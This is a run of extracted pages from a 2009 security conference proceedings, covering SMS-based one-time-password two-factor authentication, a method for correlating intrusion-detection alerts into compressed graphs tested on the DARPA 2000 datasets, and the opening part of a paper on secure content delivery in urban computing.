One-Time-Passwords solve many of the issues with static passwords. They are generated by a hardware token, a computer, mobile phone or any other device using challenge response and many other methods, therefore appear totally random. And also in addition to this they are used only once as the name suggests. This property makes them invulnerable to attack and sniffing. By changing the password every time OTP solutions introduce aliveness which is an important concept to detect if any unauthorized intruder is trying to use old information.

4 Related Technology Single Sign On (SSO) is the ability for a user to login once and gets access to multiple software systems that are related to each other but independent, using just one user ID and password. 4.1 Benefits 1. 2. 3.

Reducing password fatigue from different user name and password combinations [12]. Reducing time spent re-entering passwords for the same identity [13]. Support authentication such as Windows credentials (i.e., username/password).

12

A.S. Almazyad and Y. Ahmad

4.

It provides security on all levels to access the systems without re-entering the user credentials.

Since the static passwords are the least secure mechanism for authentication, single sign on has now become known as reduced sign on (RSO) since more than one type of authentication mechanism is used in enterprises e.g., in an enterprise using SSO software, the user logs into the system with their ID and password. This gives Single Sign On Authentication to access low risk information and multiple applications such as the information portal. However, when the user tries to access higher risk applications and information, like a payroll system, the single sign on software requires them to use a stronger form of authentication. This may include digital certificates, security tokens, smart cards, biometrics or the combinations of them.

5 Related Work There have been many researches on one-time password mechanism, and there are also many mechanisms in practice that are in use as product through commercialization. Such one-time password mechanism, which generates the password, can be classified into the Time, MIDlet based authentication. 5.1 Time Factor Based Free Auth Project has developed a MIDlet of their OTP solution [14]. Their OTP generation depends upon a time factor and it requires both client and server synchronization. Time factor sync is not possible every time and hence not an easy task and the solution is vulnerable if the synchronization fails. 5.2 Java MIDlet There is one more solution where a user should have access to a computer connected to the Internet and he must possess a mobile phone with a SIM card. A Java MIDlet is to be installed on Java enabled mobile phone which transforms the phone into a secure OTP token which can be used to log in to any service on the Internet. If the computer and mobile phone is equipped with Bluetooth higher usability can be obtained. Through the browser application on the computer user can access web services provided by service providers. The service provider (SP) is connected to an Authentication Server (AS) which in turn will handle the authentication on behalf of the SP. The AS is connected to the GSM network which enables it to communicate with the user’s mobile phone. The authenticator on the AS server communicates with the client and relays messages to the AAA server which handles the authentication [15]. There are many limitations in the practical implemention of this solution.

A New Approach in T-FA Authentication with OTP Using Mobile Phone

13

Firstly, the MIDlet should already be installed on the phone by the service provider. Secondly, current diverse range of user interfaces on different mobile phone types leads to a significant challenge for support staff. They need to be fully trained in all supported phone types to guide the end users how to use and navigate the java MIDlet application installed on the phone.

6 The Proposed System Traditional solutions require a user to carry a dedicated hardware token for each application. Mobile phones eliminate the need for a simple user or enterprise users to carry additional hardware tokens. In addition to two-factor authentication, mobile phone also delivers two-way authentication. In the traditional OTP authentication [7] mechanism there is only one way the user authenticates their identity to the application provider. One way authentication cannot prevent phishing or spoofing attacks where a fake website attempts to steal users’ identities by presenting itself as a legal commercial website. The recent studies on authentication have shown that the single isolated usage of one of these solutions does not guarantee a high security level. However, it has been shown that a combination of these techniques guarantees a stronger authentication, since it involves the usage of two separate authentication mechanisms. 6.1 Solution Overview In our work we consider the disadvantages related to the solutions described in section 5 and hence designed a well structured system with two tier security authentication. Our solution is simply to include OTP as one of the two factors in TFA with some modifications in the application side to achieve the desired degree of authentication for accessing a secure system. In our proposed solution, the pre-requisites are as under: 1. 2. 3.

A computer with internet facility. A mobile phone with working SIM card An application with two consecutive intermediate screens of authentication.

We also assume that a user is already registered with an application provider and has been provided with the static userID and password to access the initial page of the application i.e., traditional login screen wherein username and password has to be entered. To get the actual access to the application the user needs one more authentication for the second intermediate screen. That’s where OTP plays its role in T-FA authentication mechanism proposed by us. 6.2 One Time Password Generation We are using a new system of OTP generation as shown in the Fig 1. We will describe our new OTP system in the following steps listed below:

14

A.S. Almazyad and Y. Ahmad

1. 2. 3.

4.

5.

A user login to the system with the issued username and password. The application sends a notification to the host server to generate a random number (OTP) may be composed of 6 - 8 digits. The application sends this generated random number in the form of a text message SMS to the user’s mobile phone through the internet (mobile service provider). This OTP is valid for per user session i.e., until the web browser is closed or the session expires. Whenever a user logs out from the application the given OTP is still valid till the particular browser window is open. The session expires only after closing the browser window or a specified period of time. Every time a user opens a new browser window and login to the system a new request has been made and a new OTP generated.

6.3 Working of the System Firstly, a user login to the initial screen of the application with the static userID and password allotted by the application provider at the time of registration. After successfully logging into this screen the user is presented with one more screen having one more password option. Simultaneously, the underlying application sends a request to the host server and a OTP password is generated as described in the section 6.2. The user must enter this number in the intermediate screen’s

OTP

Service Provider

Web Browser

Network Interface

Internet

Computer Fig. 1. One Time Password Generation

Web server

A New Approach in T-FA Authentication with OTP Using Mobile Phone

15

User

Intermediate Screen

First Screen

App. data

Web Server Mobile

No Pass entered in time

Yes

Flow diagram 1

password option to get the actual access of the application. If the sending application doesn’t get the response of the user entering the OTP passcode for a specified period of time, it assumes some failure in sending the passcode. So, it generates a new passcode and sends it again to the user mobile as depicted in the flow diagram 1. 6.4 Comparison and Advantages In our solution it is evident that we overcome all the disadvantages related to previous solutions which are as under: 1. 2. 3. 4. 5.

There is no need for time factor synchronization on our systyem. Hence our solution doesn’t fail. In our solution we don’t need any special MIDlet installed on the device by the service provider. Also no need for fully trained support staff to guide the end users how to use and navigate the java MIDlet application installed on the phone We just use the existing SMS text messages without the need to add or support additional software on the phone. A user doesn’t need to do anything at all. It is the application provider who has to modify the application so as to implement the proposed authentication system.

16

A.S. Almazyad and Y. Ahmad

Application Data Intermediate Screen Login Screen

Application Server

Fig. 2. Our System Architecture

7 Conclusion This paper studies the Two Factor Authentication in detail and makes improvements accordingly. It also presents OTP authentication system using Mobile phones. TFA/OTP is the combined authentication system which aims to improve the security of the web applications while maintaining the security and usability through the use of a simple mobile phone device. We also presented the new concept in the web application design with the integration of one more intermediate screen. The proposed solution is easy to integrate in new or existing web applications. However, since it authenticates user and execute password authentication one more time, it has the shortcoming that authentication takes some more time. Therefore the proposed system is determined suitable in the fields where security is emphasized over time characteristics such as internet banking, electronic payment, medical system and eCommerce. And currently we also have the issue of the delay of SMS messages (OTP) in our system during peak rush hours. In our future work we are going to conduct the continuous research on the methods of reducing authentication time and the SMS delay.

A New Approach in T-FA Authentication with OTP Using Mobile Phone

17

References 1. The Failure of Two-Factor Authentication (Bruce Schneier) (March 2005), http://www.schneier.com/blog/archives/ 2005/03/the_failure_of.html 2. Haller, N.: The S/KEY One-Time Password System. In: Proceedings of the Symposium on Network and Distributed System Security (1994) 3. Rubin, A.D.: Independent One-Time Passwords. In: Proc. 5th UNIX Security Symposium. USENIX Association (June 1995) 4. Haller, N., Matz, C., Nesser, P., Straw, M.: A One-Time Password System. RFC 2289, IETF (1998) 5. Tittel, Chapple, M., Stewart, J.M. (eds.): CISSP: Certified Information Systems Security Professional, Sybex (2003) 6. Oppliger, R.: Security Technologies for the World Wide Web. Artech House (2000) 7. Lamport, L.: Password Authentication with insecure communication. Communications of the ACM 24(11), 770–772 (1981) 8. Cheswick, W.R., Bellovin, S.M., Rubin, A.D.: Firewalls and Internet Security: Repelling the Wily Hacker. Addison-Wesley, Reading (2003) 9. http://www.cryptocard.com/ 10. http://www.securid.com 11. Kim, H.-C., Lee, H.-W., Lee, K.-S., Jun, M.-S.: Networked Computing and Advanced Information Management. In: Fourth International Conference on NCM 2008, September 2-4, vol. 1, pp. 18–24 (2008) 12. White Papers on Simple and Secure Enterprise Single Sign-On, http://secude.com/htm/806/en/ White_Paper_Section%3A_Single_Sign-On.htm 13. How to Improve Business Results by Reducing IT Help Desk Costs through Secure Single Sign-On, http://secude.com/htm/811/en/ White_Paper%3A_Enterprise_SSO.htm 14. FreeAuthProject. The FreeAuth Project, http://www.freeauth.org/site (cited 2007 March) 15. Hallsteinsen, S.: Department of Telematics, Norwegian University of Science and.. Using the mobile phone as a security token for unified authentication., http://ieeexplore.ieee.org/ 16. Whitman, M.E.: In defense of the realm: understanding the threats to information security. International Journal of Information Management 24(1), 43–57 (2004) 17. Lee, N.-Y., Chen, J.-C.: Improvement of One-Time Password Authentication Scheme Using Smart Cards. Oxford Journals E88-B(9), 3765–3767 18. Archer Harris, J.: OPA: A One-Time Password System. In: International Conference on Parallel Processing Workshops (ICPPW 2002), p. 25 (2002) 19. Zhu, D.: Security control in inter-bank fund transfer. Journal of Electronic Commerce Research 3(1) (2002)

Correlating Alerts into Compressed Graphs Using an Attribute-Based Method and Time Windows Seyed Hossein Ahmadinejad and Saeed Jalili Faculty of Electrical and Computer Engineering, Tarbiat Modares University {ahmadinejad,sjalili}@modares.ac.ir

Abstract. Intrusion Detection Systems usually report a huge number of alerts every day. Since abstraction level of these alerts is very low, analyzing and discovering the attack strategies behind the alerts are not easy or even possible. Alert correlation methods have been developed to decrease the number of alerts and provide a high-level abstraction of them. In this paper, we propose a method to estimate correlation probabilities between alerts. The concept of time windows is applied in a special way to decrease the complexity and increase the accuracy as well. Besides, we suggest a compression method for more reduction in the number of comparisons needed for correlating alerts and making the output of the method more intelligible. Our experiments reveal while the proposed correlation method performs accurately, its complexity dropped noticeably compared to previous methods.

1

Introduction

Security has always been one of the great concerns about networks. Intrusion detection system (IDS) is one of the techniques developed to establish security in networks. However, alerts raised by IDSs are not so meaningful that the administrator could analyze them directly. Furthermore, IDSs generate too many alerts. Clearly, finding the strategy of attack from primitive alerts is impossible for human. Therefore, a higher level management is required to reduce the number of alerts and provide a brief and high-level view of the security state of the protected network. Alert Correlation methods have been proposed to address this challenge. Quite a number of techniques from various approaches have been suggested. In this paper, our mehod is based on the fact that there are some similarities between attributes of correlated alerts. We organize correlated alerts in different groups. When a new alert arrives, first we should find to which group it belongs and then with which alerts it is correlated in that group. Each group is divided into time windows. To find the host group of the new alert, we select some alerts from each group and compare them with the new alert. By using time windows, 

This project has been supported in part by the Iran Telecommunication Research Center(ITRC) under grant no.T/500/20120.

´ ezak et al. (Eds.): SecTech 2009, CCIS 58, pp. 18–25, 2009. D. Sl  c Springer-Verlag Berlin Heidelberg 2009 

Correlating Alerts into Compressed Graphs

19

we avoid selecting all previous alerts for comparison because it is not practial in the real world. To compare two alerts, a similarity vector is extracted from their attributes such as IP, Port etc and a correlation knowledge base. A classifier estimates their correlation probablity using their similairity vector. After finding the host group, those alerts that their correlation probability with the new alert is more than a predefined threshold are correlated with the new alert. Our main contribution in this paper is a method to compress groups of correlated alerts using merging similar alerts. The remainder of this paper is organized as follows: next section presents main principles and steps of the proposed method. Section 3 illustrates the experiments we have done to show the abilities of our method. Section 4 discussed related works and advantages of our method over them. Last section concludes this paper and points out some future research directions.

2 2.1

Alert Correlation Method Correlation Knowledge Base

Alerts raised by IDS have a type attribute. We use a matrix structure exactly the same as the one we defined in our previous work [1] to store the correlation strength between any two types of alerts. This matrix is incrementally updated during the alert correlation process. Actually this matrix encodes knowledge about correlation information between all pairs of alert types. The most important information in the knowledge base is correlation strength between alert types which is shown as CS(ai , aj ) and computed as follows: CS(ai , aj ) =

n 

pi,j (K)

(1)

k=1

Where Pi,j (k) is the probability of k th correlation between ai and aj (types of ith and j th alerts). Moreover, n is the number of times these two types of alerts have been correlated. 2.2

Similarity Vectors

In order to estimate correlation probability between two alerts, a similarity vector is created according to their attributes. Feature 1: Source IPs Similarity. Similarity between two IPs is computed by counting the number of high-order bits in the first IP which are the same as another IP. The value of this feature is between 0 and 1. Feature 2: Destination IPs Similarity. It is computed like Feature 1. Feature 3: Destination Ports Similarity. If the destination port numbers of two alerts are just the same, this feature will be 1, otherwise it will be 0. Feature 4: Alerts IP Chain. The value of this feature will be 1 if source IP address of the new alert matches destination IP address of the previous alert.

20

S.H. Ahmadinejad and S. Jalili

Feature 5: Alerts Type Chain. The likelihood that an alert type would be followed by another alert type.This feature is computed according to the following equation: n  AT C(ai , aj ) = CS(ai , aj )/ CS(ak , aj ) (2) k=1

Feature 6: Correlation Frequency. The number of times two alert types were correlated divided by the number of times these two types were compared. 2.3

Correlation Probability Estimation

In order to estimate the correlation probability between two alerts based on their constructed similarity vector, we use a classification method. To select the proper classifier, many classification methods were tested in terms of their accuracy. LogitBoost[2] - a boosting method - with DecisionStump[2] as its base learner led to the best result. Due to the space limitation, it is not possible to show the evaluation results in this paper. 2.4

Correlating Alerts

First we define a few terms which will be used in this paper: –Alert: a primitive message raised by an IDS. –Alert Set: a set of several alerts with the same alert type and located in the same time window. (we use alert set instead of alert due to the need for a structure which could contain more than one alert) –Front alert: the last alert inserted in an alert set. –Hyper Alert Graph (Hyper Alert): a graph of correlated alerts whose nodes are alert sets and edges depict correlation between nodes. In the first step, the classifier should be trained. We created a small training set based on the principles of correlation between alerts attributes. We put alerts into alert sets to support compression because some alerts might be merged in the compression step. Hyper alerts contain alert sets and each alert set contains one or more alerts. Each group of correlated alerts is placed in a different hyper alert. When a new alert arrives, a new alert set containing the new alert is created. A hyper alert whose alerts have the highest average of correlation with the new alert should be selected as the host hyper alert. To find the host hyper alert, the new alert is compared with previous alerts spreading over hyper alerts. Since comparing the new alert with all previous alerts in all hyper alerts is time consuming and it might be even impossible due to the large number of alerts, a part of alerts in each hyper alert is selected for comparison. For the purpose of selecting some delegate alerts from hyper alerts, we consider time windows over them. However, unlike those methods which use time windows to avoid investigating the correlation of old alerts with the new one, we just want to focus more on newer alerts not to omit old alerts. This more attention to recent alerts decreases the probability of being affected by too old alerts. To do so, a few alerts not all of them are selected from time windows using a new technique. If there

Correlating Alerts into Compressed Graphs

21

is totally n time windows in a hyper alert, we select λ alerts from time window wi (ith time window in the hyper alert) according to the following equation: β = i × number of alerts in wi / n

(3)

λ=α∗β

(4)

Where β is a number less than the number of alerts in wi and α is a constant value (set by an expert) between 0 and 1 helps us to select even fewer alerts. We aim to pick more alerts from those time windows that are closer to current time or contain a considerable number of alerts. As stated above, nodes of hyper alerts are alert sets not alerts. So, sample alert sets are picked using (4) for all time windows of a hyper alert. The new alert is compared with the front alert of each selected alert set because there might be more than one alert in the selected alert set. To compare them with the new alert, similarity vectors are constructed and fed into the classifier. The output of the classifier for a similarity vector -correlation probability- is multiplied by the number of alerts merged in the alert set. All correlation probabilities are added together and divided by the number of comparisons. The result called CorrelationFactor shows the average correlation probability between the new alert and a hyper alert. CorrelationFactor is computed for all hyper alerts. During this process, the maximum of estimated correlation probabilities is stored for every hyper alert. Before describing the rest of the method, it is necessary to introduce two thresholds: Correlation Threshold: a threshold to find the host hyper alert for the new alert. Correlation Sensitivity: a threshold to find those alerts that are correlated with the new alert in the host hyper alert. Once CorrelationFactor is computed for all hyper alerts, a hyper alert with the maximum value of CorrelationFactor is selected. If the maximum correlation probability in the selected hyper alert is more than the Correlation Threshold, the selected hyper alert will be the host of the new alert set. Otherwise, a new hyper alert is created and the new alert set will be placed there. In the former case, the new alert set is compared with all of the alert sets in the host hyper alert to specify some of which that are correlated with it. This comparison step is done exactly like the previous step. If pi is the correlation probability between the new alert alnew and an alert set asi in the host hyper alert and pmax is the maximum correlation probability, alnew is correlated with asi if the following condition evaluates to true: pmax − pi < Correlation Sensitivity

(5)

After correlating two alert sets, their corresponding cell in the correlation knowledge base is updated. Eventually, each group of correlated alerts gather in different hyper alerts. Furthermore, there is a hyper alert compression method which is used during the correlation process to not only cause more reduction in the number of comparisons but also to suppress abundant details. Although it might

22

S.H. Ahmadinejad and S. Jalili

have a little effect on the accuracy of the system, this degradation can be controlled by means of a threshold which will be explained in the next section. The frequency of the compression process is specified by a security expert.

3

Compression Method

As long as new alerts arrive, size of the hyper alerts grows as well as the number of comparisons. On the other hand, there are some nodes (Alert sets) that are very similar in their relation with other nodes and we can merge some of them to boost performance, even though with a negligible decrease in accuracy. First, we define some variables and functions for a node asi (alert set) in a hyper alert: asi .parent: a set of nodes (Alert sets) connected to asi . asi .children: a set of nodes (Alert sets) to which asi is connected. subtract(set1 , set2 ): set1 when we remove those nodes that exist in set2 . size(set1): number of elements (Alert sets) in set1 . Two alert sets asi and asj merge together in compression phase if the following statements evaluate to true: – asi and asj are in the same time window. – asi and asj have the same alert type.

1−

size(subtract(asi .children,asj .children)) size(asi .children)

> Strictness

– 1−

size(subtract(asj .children,asi.children)) size(asj .children)

> Strictness

– 1−

size(subtract(asi .parent,asj .parent)) size(asi .parent)

> Strictness

– 1−

size(subtract(asj .parent,asi .parent)) size(asj .parent)

> Strictness

–

To merge two alert sets, a new alert set is created with union of alerts contained in the two alert sets and union of their relations with other alert sets. For repetitive edges, only one of them is stored but the number of repetitions is also held to show its strength. Strictness is a threshold between 0 and 1 defined by the administrator to control a trade-off between accuracy and performance. The more the Strictness is, the less the hyper alert is compressed. The merging process continues provided that there is a pair of alert sets which can merge according to above conditions.

4 4.1

Experimental Results Method Validation

To evaluate our method, we used DARPA2000 dataset [3]. There are 2 attack scenarios: LLDOS1.0 and LLDOS2.0.2. In the both scenarios a novice attacker tries to install components necessary to run a Distributed Denial of Service, and then launch a DDOS at a US government site. We tested our method on both

Correlating Alerts into Compressed Graphs

23

0:Admind 3 1:Sadmind_Ping

1 1 10

7

10

10 3:Admind

6

14

1

6:Admind

13 1

1

1

9

9

10

1

7:Sadmind_Amslverify_Overflow

7

9

8 34:Rsh

8

54:TelnetTerminaltype

1

1 1

49:Mstram_Zombie

1 52:Rsh

1 1 53:Mstream_Zombie

55:TelnetXdisplay

1

1 1

1 41:Mstream_Zombie

1

1 1

1 1

1

1

1

1 1

1

56:TelnetEnvAll 1

57:Mstream_Zombie

Fig. 1. Hyper alert graph created for LLDOS1.0

datasets, but we can illustrate the result of our experiments only on the first dataset due to space limitations. We used RealSecure to generate alerts for the datasets. Figure 1 displays a hyper alert built for LLDOS1.0 . RealSecure does not raise any alert for the first step of attack but a few ’sadmind-ping’ alerts are generated when the attacker tries to find out which hosts are running the ’sadmind’ remote administration tool. Then, attacker wants to penetrate into the hosts recognized as vulnerable machines in previous step. So IDS raises several ’admind’ and ’sadmind-amslverify-overflow’. For the fourth step, logging into victims and installing ’mstream’ software cause five types of alerts, ’Rsh’, ’TelnetXdisplay’, ’TelnetEnvAll’, ’TelnetTerminaltype’ and ’Mstream-Zombie’. The last stage of attack leading to a few ’stream-DOS’ alerts could be included in the hyper alerts through initializing the corresponded cells in the knowledge base with proper values. As can be seen in the Fig. 1, all alerts were accurately correlated. 4.2

Method Evaluation

In this section, we compare three configurations of our implementation to show the effectiveness of the method. We did not use time windows and compression method in the first configuration. The new alert is compared with all received alerts. In the second configuration, we added time windows and at last, the third configuration is our complete correlation method. Figure 2 indicates differences between these configurations when we consider the number of comparisons. Evidently, number of comparisons in the first configuration is almost four times as high as the figure for the third configuration because the compression method merges similar nodes and reduces candidate alerts for comparison. However, according to Fig. 3, the second configuration performed better than the others in

24

S.H. Ahmadinejad and S. Jalili

C2

C3

C1

C2

C3

10 9 8 7 6 5 4 3 2 1 0

E Error

Num mber off compparisonns(thouusandss)

Configuration Configuration C1 450 400 350 300 250 200 150 100 50 0 LLDOS1.0

Dataset

LLDOS1 0 LLDOS1.0

LLDOS2.0.2

Fig. 2. No. of comparisons in the three configurations

LLDOS2 0 2 LLDOS2.0.2

Dataset

Fig. 3. Errors in the three configurations

regard to accuracy because it avoids comparing the new alert with very old alerts that can deflect our mehod from working correctly. Since compression procedure aims to merge some nodes, naturally it loses some details that has a small impact on the error rate of the correlation system but it is still much better than the first configuration.

5

Related Works

A class of alert correlation methods aims to find causal relationships among alerts through their pre and post conditions [4,5,6]. If post conditions of an alert satisfy pre conditions of another alert, they are correlated. Specifying pre and post conditions is time-consuming and error-prone. Additionally, if there are not any causal relationships between two alerts, they will not be correlated. The second group of alert correlation techniques is pre-defined attack scenario-based methods [7,8]. If alerts contribute to construction of a predefined attack scenario, they should be correlated. Unfortunately, It is not reasonable to assume that defender can reliably know all vulnerabilities on the network to create a complete attack graph. Moreover, if the attacker lunches an unknown attack, these methods could not work properly. Some methods utilize machine learning techniques for alert correlation[9,10,11]. Our work in this paper is slightly similar to [11]. However the method proposed in [11] seems costly and impractical. Comparing the new alert with all received alerts used in [11] is not practical. Finally, temporal based methods [12,13] correlate alerts according to their temporal relationships. This class of methods is capable of correlating alerts that may contribute to unknown attacks but if the attacker puts delays into his attack strategy, he can evade the security system. The way that we apply time windows can resolve this problem to a great extent.

6

Conclusion and Future Works

In this paper, we propsoed a method that employ a classifier to estmiate correlation probability between alerts based on their attributes. Correlated alerts are

Correlating Alerts into Compressed Graphs

25

organized in several hyper alerts. Since recent alerts are more important in correlation, we consider time windows over hyper alerts. Hyper alerts are compressed with a predefined frequency by merging those alert sets that are very similar and raised in the same time window. Compression has a great improvement in the number of comparisons according to the experiments . Our method can discover unknown attacks because it does not depend on domain knowledge about known attacks. In our future research, we will develop a technique to find the values of thresholds and variables automatically during the correlation process.

References 1. Ahmadinejad, S.H., Jalili, S.: Alert correlation using correlation probability estimation and time windows. In: International Conference on Information Theory and Engineering, Kota Kinabalu, Malaysia. IEEE Computer Society CPS, Los Alamitos (2009) 2. Friedman, J., Hastie, T., Tibshirani, R.: Additive logistic regression: A statistical view of boosting. Annals of statistics, 337–374 (2000) 3. http://www.ll.mit.edu/mission/communications/ist/corpora/ideval/data/ index.html Darpa 2000 intrusion detection evaluation datasets (2000) 4. Ning, P., Cui, Y.: An intrusion alert correlator based on prerequisites of intrusions. Submitted for publication. Technical report, Available as Technical Report TR2002-01, Department of Computer Science, North Carolina State University (2002) 5. Ning, P., Xu, D.: Learning attack strategies from intrusion alerts. In: Proceedings of the 10th ACM conference on Computer and communications security, pp. 200–209. ACM, New York (2003) 6. Templeton, S., Levitt, K.: A requires/provides model for computer attacks. In: Proceedings of the 2000 workshop on New security paradigms, pp. 31–38. ACM, New York (2001) 7. Wang, L., Liu, A., Jajodia, S.: Using attack graphs for correlating, hypothesizing, and predicting intrusion alerts. Computer Communications 29(15), 2917–2933 (2006) 8. Siraj, A., Vaughn, R.: A cognitive model for alert correlation in a distributed environment. In: Kantor, P., Muresan, G., Roberts, F., Zeng, D.D., Wang, F.-Y., Chen, H., Merkle, R.C. (eds.) ISI 2005. LNCS, vol. 3495, pp. 218–230. Springer, Heidelberg (2005) 9. Li, Z., Zhang, A., Lei, J., Wang, L.: Real-Time Correlation of Network Security Alerts. In: Proceedings of the IEEE International Conference on e-Business Engineering, pp. 73–80. IEEE Computer Society, Washington (2007) 10. Dain, O., Cunningham, R.: Fusing a heterogeneous alert stream into scenarios. Applications of Data Mining and Computer Security (2002) 11. Zhu, B., Ghorbani, A.: Alert correlation for extracting attack strategies. International Journal of Network Security 3(3), 244–258 (2006) 12. Qin, X., Lee, W.: Statistical causality analysis of infosec alert data. In: Vigna, G., Kr¨ ugel, C., Jonsson, E. (eds.) RAID 2003. LNCS, vol. 2820, pp. 73–93. Springer, Heidelberg (2003) 13. Benjamin, M., Herve, D.: Correlation of Intrusion Symptoms: An Application of Chronicles. In: Vigna, G., Kr¨ ugel, C., Jonsson, E. (eds.) RAID 2003. LNCS, vol. 2820, pp. 94–112. Springer, Heidelberg (2003)

A Study on Secure Contents Using in Urban Computing Hoon Ko1, Jongmyung Choi2, and Carlos Ramos1 1

GECAD, Institute of Engineering Polytechnic of Porto, Rua Dr. Antonio Bernardino de Almeida, 431, 4200-072 Porto, Portugal [email protected], [email protected] 2 Department of Computer Engineering, Mokpo National University, 61, Dorim-Li, Chyounggye-Myeun, Muan-Gun, Jeon-nam, S. Korea [email protected]

Abstract. Urban computing provides the services by considering of user’s devices and environments near user’s location. That means that it can be detected their moving by sensor the generated contexts during user moving. And they can guess the user’s next moving through these detected contexts. During user’s moving, there are getting more increase the number of contexts. And the more increase the number of users, the more detect the number of context by sensor. Therefore, there are so many users / devices for attacking. However, existing urban computing is insufficiency to process the security module. To use it in safety, we studied how we have to use urban computing in safety. In this paper, we suggest the way to secure contents using in urban computing. Keywords: Urban Computing, Context-Aware, Contents, Spam-mail, Authentication / Authorization.

1 Introduction An aim of urban computing is continually to provide services between users and space / environment information near moving users [3]. That is, users can take all services during their moving over their devices through processing organic processing between user’s environment and space environment. The relation among users, between users and urban constituent are very important in urban space. Because users usually ask to get useful services during their moving, also users would like to receive the services what they want from some shops without any stopping. Users periodically may want to get that information or on during their shopping. These days, sending information to users is usually responsible for SMS or letter. Although some company services to user’s requesting, still there are some problems like no detail of products, sending them to users who don’t want to get, etc. It can be considered as SPAM mail in future. Anyway, in order to receive information of what they want send; first users have to register asking information into shops (called CP, it’s server in each shop). And contents provider (CP) must keep it up-to-date, a certificate Server (CS) and a secure server (SS) should control the security service between contents servers and users. Also, CS and SS have to observe attacks by attackers. If attackers D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 26–34, 2009. © Springer-Verlag Berlin Heidelberg 2009

A Study on Secure Contents Using in Urban Computing

27

illegally put his information to CP, users in database may receive unwanted information. To protect those problems, CS has to process an authentication to confirm integrity for their asking. This article is composed by four chapters. Section 1 is to be an introduction and we explain our proposed secure context operation in section 2; section 3 is for some discussion. At last, we make a conclusion in section 4.

2 Secure Context Operating 2.1 Security Functions We explain about each mission of four, which is a context allocator, a context analyzer, a context collector, and a context detector for secure processing in urban computing [Fig. 1] [4]. Context Detector (CD): CD is to detecting to all contexts changing. Context Collector (CC): CC gets together all contexts from CD. First processing of security (An authentication / an authorization) is this area’s job. All contexts that were detected on all sensors will be transferred to security framework [4][9], and then they get a security processing. According to this process, they decide whether they set the security level or not. Context Analyzer (CA): CA defines the security policy received context from CC. Context Allocator (CoA): CoA suitably arranges them to each module.

Fig. 1. Security Functions

2.2 Urban Life User A and user B have to register their requesting about their wanted information of product before their moving. Also, each shop has to keep up to date their information of product in CP [Fig. 2].

28

H. Ko, J. Choi, and C. Ramos Table 1. Definition Symbol C CS CP SS

Name Contents Certificate Server Contents Provider Secure Server

SS.3

SS.2

Safe CP / Users Safe CPProvider] / Users [Contents [Contents Provider] D.CP = User [E,… G] D.CP = User [E,…,I] G] G.CP = User [B,D,… G.CP = User [B,D,… ,I] [Users] [Users] B,User, D,User,I.User B,User, D,User,I.User E.User, G.User,... E.User, G.User,...

CP.4

CP.1 Put the shop’ s information for Each users A.Shop

Safe CP / Users [Contents Provider] A.CP = User [ A,E,… G,H] B.CP = User [A,B,D,… ,G,I] [Users] A.User, B,User, D,User, E.User, G.User, H.User, I.User ...

SS.1

CP.5 CP.6

Contents detail information of all products Control all SS / User Support product information Control CPs

A.User : Asked List… E.User : Asked List … : : G.User : Asked List … H.User : Asked List …

CP.3

Forbid to put unauthorized / unauthenticated shop’s Information

CP.2

C.Shop

A.User : Asked List… B.User : Asked List … D.User : Asked List … : : G.User : Asked List … I.User : Asked List …

Put the shop’s Information for Each users

B.Shop

A.C

A.C A.User

H.C B.C

B.User

Ask each information

H.User

C : Contents CP : Contents Provider SS : Secure Server CS : Certificate Server

Fig. 2. Urban Life. User A / user B have to register their requesting information before their moving.

Therefore, CP is keeping some information, which is user’s requesting item and registered product’s contents by shops, and then CP sends information to user’s device with relation between tables in databases. A defined symbol is to be the table 1. 2.3 Each Step Each user puts their asking into shop’s computer like below. (The shops register, which is information into the related CP with shops. CP.1 controls A.Shop and CP.2 manages B.Shop. // A.Shop.CP.1 / B.Shop.CP.2 A.User’s Asking::[/P.1.Cont.2/P.2.Cont.1/]->CP.1 A.User’s Asking::[/P.3.Cont.1/]->CP.2 B.User’s Asking::[/P.2.Cont.1/P.2.Cont.1/]->CP.2

A Study on Secure Contents Using in Urban Computing

29

Fig. 3. Steps

Fig. 4. CP, contents and users certificate. CS keeps security information of SS and SS controls CP and user’s.

Each CP detects user’s moving when users are being in their area. As soon as CP is aware of user.A, he transfers them to user.A.

30

H. Ko, J. Choi, and C. Ramos

Fig. 5. New user

2.4 Security Processing If CS gets requesting confirmation of SS from CP, then CS takes a process about that. Basically, CS follows the structures and policies of PKI. SS is responsible for CP and user’s authentication. Therefore, SS manages security information for user and CP, he can send the security results to each other if they want it. Also, generally SS processes user’s confirmation through CS. In side user D, he didn’t register his information in CP.1 and SS.1, so CP.1 and SS.1 have no user D’s information. Consequently, CP.1 and SS.1 will reject user D without hesitation as soon as user D’s asking. [Fig. 4, In red line]. In near future, user D want to receive information of products from them, it has to be the first time to put his requesting to shop (1). CP.1 transfers user’s requesting information to SS.1, SS.1 take a confirmation for CP.1 / user D (2). Of course, firstly SS.1 identifies CP.1 requesting through user D (3)(4). If SS.1 replies the result to CP.1, then all processing will be finished for user D (5)(6) [Fig. 5].

3 Discussion 3.1 Algorithm Table 2 is used Notation for this article analysis. In this research, we suppose that there are N users, who would be randomly distributed according to the channel of Networks (Shops). Each user moves in their way. {

Model Initial „

{

n = N , Ti = user Avg. inactivation time / Arrival schedule of first asking

Contents asking / processing „ Processing and contents beginning schedule for arrival „

n = n −1 schedule

/

(time() + exp ntl (Ti / n)) * f ( xn * wn ) Next arrival asking

A Study on Secure Contents Using in Urban Computing

31

Table 2. Notation

Symbol

Contents

xn yn wi f1 f2 sn tn T b

The number of User (1, 2, ….. , n) Output values of each users = Weight (ex, security rate, power, etc) Activation function for Users * Weight Activation function for Transferring Time * Contents Size Contents Size of User n Transferring Time Critical Values Bios Point

Cost (C )

Total Cost

Fig. 6. Cost model

Fig. 6 shows us the cost estimation, which is happened when the contents are transferred through proposed model. And we put the user’s information into proposed algorithm in order to activation point of user, that is, users, weight, message size, transferring time. Formula 1 is the cost generation algorithm for user i.

yi = f i ( xi × wi ) + f 2 ( si × ti )

(Formula 1)

And, we define the algorithm for total cost like formula 2.

Cost (Cn ) = f1 ( xn × wn ) + f 2 ( sn × t n )

(Formula 2)

Cost for users will be computed with the sum of between (the number of users * weight, formula 3) and (transferring time * content size, formula 4). f1 ( xn × wn ) = x ⋅ wT

f 2 ( sn × t n ) = s ⋅ t

⎡ w1 ⎤ (Formula 3) ⎢w ⎥ 2 = [ x1 , x2 ,..., xn ]⎢ ⎥ ⎢: ⎥ ⎢ ⎥ ⎣ wn ⎦ = x1 ⋅ w1 + x2 ⋅ w2 + ... + x n ⋅ wn

